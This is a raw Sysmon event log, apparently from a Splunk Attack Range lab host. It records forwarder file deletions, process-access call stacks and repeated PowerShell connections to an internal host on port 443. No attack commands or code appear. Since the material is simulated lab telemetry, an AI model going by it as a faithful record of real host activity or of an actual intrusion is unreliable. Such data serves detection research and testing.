Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=9B916EA44940AE79DE7804599286A241,SHA256=C383F49C4216F2D419EB47D5C6CFA4CBD32BA19953237179AF0989BCAA684939,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496582Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:49.265{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A247F034793480CFDE21F9C07F3F3D0,SHA256=661768C2A2D65C87837A4055D865B38E7CF2DBDA4DF16273218E5D993442A59A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496586Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:20.246{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50427-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000036496585Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:19.912{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50426-false10.0.1.12-8000- 23542300x800000000000000036496584Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:50.279{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6807C7375137D2802E6CB0AB8054C35D,SHA256=F58B2D07C3D63EA5680412436C646C8D4EE00211007B1541DECF0067171CF46B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496587Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:51.294{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E332B377961DA9A9EB4514EEBD8A78A,SHA256=DC924B829CDBA2A41DF8A2C46481BB8ADE85171138FEDFF09FED8C843E43EFF0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496588Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:52.310{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B167A5E00457643566064AD71A2014E,SHA256=43C0841D34701B02BAFDA896FA0C3667CF59B39D575ACA8BBC744B2B67118031,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496589Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:53.326{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F58590EB0F7F6147BA166677433C338E,SHA256=29AB64470ECFAB9BDB87525E2AD0A041F48469ED511288CB3FA88C2D3396CBD6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496591Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:54.808{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B752F87B38094719268A3D185266CE6D,SHA256=2101961A5E0B421A365937EB5982A8DA1D736FD28D650A834A60F0CA7C988F61,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496590Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:54.329{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F93ADAA26C32A5BDBE3B81452FD51E84,SHA256=0A33FDE9D6F4E0B17EA4194007299EA8A6AE04DA812D1A6FF539D9DFFBFAE2BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496594Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:25.726{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50429-false10.0.1.12-8000- 354300x800000000000000036496593Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:25.259{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50428-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496592Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:55.345{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6236DFB8A3CD6771BD1D1D0EB5724888,SHA256=CAF699FDF4BF7FD710BE441E926F6F098EF56E4C60765956A335A3C04B388D94,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496595Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:56.425{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B5D561E32D90289D27235B93F1F88B1,SHA256=EE72FFC48A8B228A4D36194E5DE2DACEE2050CB7E6E8CFC48ACDEB775BCFE79C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496597Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:57.673{B81B27B7-4012-611D-0D00-00000000C801}7922340C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036496596Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:57.442{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D177A81DDE160FFF6DC89FD09890E85,SHA256=B5DEA719985F8028B5CD2C84F31305EBE849E860D0443072BD93CEBF5AED2FD2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496599Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:58.672{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=21C1A3506BE07EBA0382EA4B3EBE70D2,SHA256=0120135AEAA06E34E8A244FC63C96664BFE082C6FDD09BF3F85D81CB670BA837,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496598Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:58.457{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3AA9FFB17260F82FDC1167CAA9480722,SHA256=DE578AC14E13B8134F44F445085F30260C70B3DEE5523E23A5339A621DAB667A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496601Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:59.521{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5332B1C436BE9B9B032B52A9FCC522CF,SHA256=AA0FF629C728D319DDDA1848167EE6546E0F61FBD5FE245F57F0237C305A49E0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496600Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:29.270{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50430-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496602Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:00.555{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BCDF4DABFBD2ADDF7A3B5DBFB719D81,SHA256=6F844A1446635D762528514B7F24E1E7A5B18B93206240345F811C9703D6DEE0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496603Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:01.569{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D0ED2AE12637B85352067CEDAFB8E2E,SHA256=B2C27D4E5D977F7CB02771D53DD7858160754F22F5215A653EE9E7FBD0C06030,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496605Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:02.600{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4942973990328214941DF7F688ACDF7,SHA256=CE6191D0DDF83B9CF4F4822F9372CEE489099C2596EF89DB06037C6EFFE40405,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496604Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:31.750{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50431-false10.0.1.12-8000- 23542300x800000000000000036496607Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:03.619{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=28A4BAD684CA0594540319E5853149D0,SHA256=7D365CD092EEB48744BAB7957F4C8381E4BAA615C49173730FD07AED140E108F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496606Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:03.618{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AAE46659CC938B52B7AF6DE5592DA841,SHA256=F26F81FDA33CE213B151E0F53C43D912CC1E23343C4D8C632F6BE4004427A497,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496609Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:34.281{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50432-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496608Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:04.651{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B5A3A9166245359838754394BECCBA9,SHA256=4AB95B4CE6383325B0686DB88325B35E2F897C3BF4135DAED243859AEC6878EE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496610Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:05.665{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6508AFA730C66A503B5D96F262216B9E,SHA256=804174DEE0290F24AB787C3F38E3FE06CA1A255EA3A6BCB575548D9F0C8F8BF3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496611Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:06.714{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF99BC1F5BE10BAD4883CCAD642A9CC5,SHA256=E9B0BB1593D1E2474633DC5C7CC0EE45E6963C5CBFFC8F7287A8DBF904339DEA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496621Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:07.946{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-9FE3-6140-6056-04000000C801}4516C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496620Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:07.946{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496619Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:07.946{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496618Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:07.946{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496617Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:07.946{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496616Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:07.946{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-9FE3-6140-6056-04000000C801}4516C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496615Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:07.946{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-9FE3-6140-6056-04000000C801}4516C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496614Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:07.932{B81B27B7-9FE3-6140-6056-04000000C801}4516C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000036496613Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:37.760{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50433-false10.0.1.12-8000- 23542300x800000000000000036496612Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:07.731{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D8569F3D9F7F8D2F6BBE8C0F669C481,SHA256=09A08BD4BB244C96AE384C906E95C65E57D0E079F961B45A53C7237697A4718B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496634Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:08.945{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=79787A6E962541CB81C2170AA779F7C7,SHA256=AF7434E4D24E71D90E10B422D2610CC0F6AA00FEE637DC49597C24792A16F11A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496633Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:08.945{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2031E7289D1A8A0FB276601AFE733AB7,SHA256=B1F226AB84D972DF72DCFCADB880DFFD9E29FB28D5AFB126F270D487A413468C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496632Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:08.745{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6610224E76BFB72009FADE2994220F1B,SHA256=D38CD4894462C99EBED0E4F46F6FD53A5B3121890E1E13BBD71BD58B89F6A834,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496631Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:08.645{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-9FE4-6140-6156-04000000C801}912C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036496630Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:08.645{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=C224A8DB84351308B419A238038F6E13,SHA256=418BCD558AF28F42394A30328D7FA26AAB284860A9B1334FD30A07E0BA5A06A2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496629Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 